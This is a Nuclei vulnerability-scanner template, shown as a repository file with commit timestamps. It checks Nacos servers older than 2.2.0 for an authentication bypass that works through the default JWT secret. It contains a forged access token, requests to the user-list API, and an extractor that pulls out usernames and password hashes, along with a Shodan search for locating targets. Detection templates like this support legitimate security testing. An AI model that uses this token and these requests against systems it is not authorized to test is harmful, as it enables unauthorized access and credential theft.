nuclei-templates/http/misconfiguration/nacos-authentication-bypass...

55 lines
1.5 KiB
YAML
Raw Permalink Normal View History

2023-03-21 08:34:06 +00:00
id: nacos-authentication-bypass
info:
2023-03-21 08:34:06 +00:00
name: Nacos < 2.2.0 - Authentication Bypass
author: Esonhugh
severity: critical
description: |
2023-03-21 08:34:06 +00:00
The authentication function of Nacos is can be bypass through default JWT secret.
2023-10-14 11:27:55 +00:00
remediation: Change value of jwt secret in the configurations
reference:
- https://github.com/alibaba/nacos/issues/10060
- https://avd.aliyun.com/detail?id=AVD-2023-1655789
- https://nacos.io/zh-cn/docs/auth.html
2023-03-21 08:44:15 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2023-03-21 08:44:15 +00:00
shodan-query: title:"Nacos"
2023-03-21 08:34:06 +00:00
tags: auth-bypass,nacos,misconfig,jwt
variables:
token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
http:
- method: GET
path:
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
2023-10-14 11:27:55 +00:00
2023-03-21 08:34:06 +00:00
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
matchers-condition: and
matchers:
- type: word
words:
- '"username":'
- '"password":'
condition: and
2023-03-21 08:34:06 +00:00
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
2023-03-21 08:34:06 +00:00
extractors:
- type: json
part: body
2023-03-21 08:34:06 +00:00
name: extracted-credentials
json:
2023-03-21 08:39:52 +00:00
- ".pageItems[]"
# digest: 4a0a00473045022100b95321d1e39c1144be064fed1cadae81440d89ebb60048ac3fcd6b55d9abfe8c02201f7a93d902fa594e7da9a08c50511965c01ba37669ce94af0d0b7f0dbbcb34c7:922c64590222798bb761d5b6d8e72950